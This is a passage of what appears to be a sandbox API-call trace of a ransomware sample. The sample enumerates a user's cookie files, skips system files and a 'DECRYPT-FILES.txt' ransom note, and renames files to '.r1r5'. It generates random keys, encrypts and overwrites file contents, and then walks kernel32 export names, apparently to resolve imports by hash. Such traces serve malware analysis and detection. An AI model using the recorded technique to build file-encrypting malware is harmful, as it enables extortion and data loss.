HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt") returned 113 [0079.263] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5") returned 118 [0079.263] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt.r1r5"), dwFlags=0x0) returned 1 [0079.263] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.264] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.264] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.264] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x534b4210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x562c6900, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x562c6900, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@bing[1].txt", cAlternateFileName="5PBE12~1.TXT")) returned 1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="autorun.inf") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="boot.ini") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="desktop.ini") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="ntuser.dat") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="iconcache.db") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="bootsect.bak") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="thumbs.db") returned -1 [0079.264] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@bing[1].txt", lpString2="Bootfont.bin") returned -1 [0079.264] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@bing[1].txt") returned 32 [0079.264] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.264] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.264] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.264] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.264] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.264] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@bing[1].txt") returned 32 [0079.264] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.265] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@bing[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" [0079.265] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.265] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=490) returned 1 [0079.265] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.265] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.265] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.266] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.266] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.266] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.266] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.266] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.267] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.267] CloseHandle (hObject=0x464) returned 1 [0079.267] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.267] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.268] CloseHandle (hObject=0x0) returned 0 [0079.268] CloseHandle (hObject=0x460) returned 1 [0079.269] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.269] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.269] GetTickCount () returned 0x114c4f5 [0079.269] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.270] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.270] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.270] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.270] lstrlenA (lpString="kernel32.dll") returned 12 [0079.270] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.270] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.270] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.270] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.271] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.271] lstrlenA (lpString="ADDATOMA") returned 8 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.271] lstrlenA (lpString="ADDATOMW") returned 8 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.271] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.271] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.271] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.271] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.271] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.271] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.271] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.271] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.271] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.271] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.271] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.271] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.271] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.271] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.271] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.271] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.271] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.272] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.272] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.272] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.272] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.272] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.272] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.272] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.272] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.272] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.272] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.272] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.272] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.272] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.272] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.272] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.272] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.272] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.272] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.272] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.272] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.273] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.273] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.273] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.273] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.273] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.273] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.273] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.273] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.273] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.273] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.273] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.273] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.273] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.273] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.273] lstrlenA (lpString="BEEP") returned 4 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.273] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.273] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.273] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.273] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.273] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.274] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.274] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.274] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.274] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.274] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.274] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.274] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.274] lstrlenA (lpString="CANCELIO") returned 8 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.274] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.274] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.274] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.274] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.274] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.274] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.274] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.274] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.274] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.274] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.274] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.275] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.275] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.275] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.275] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.275] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.275] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: 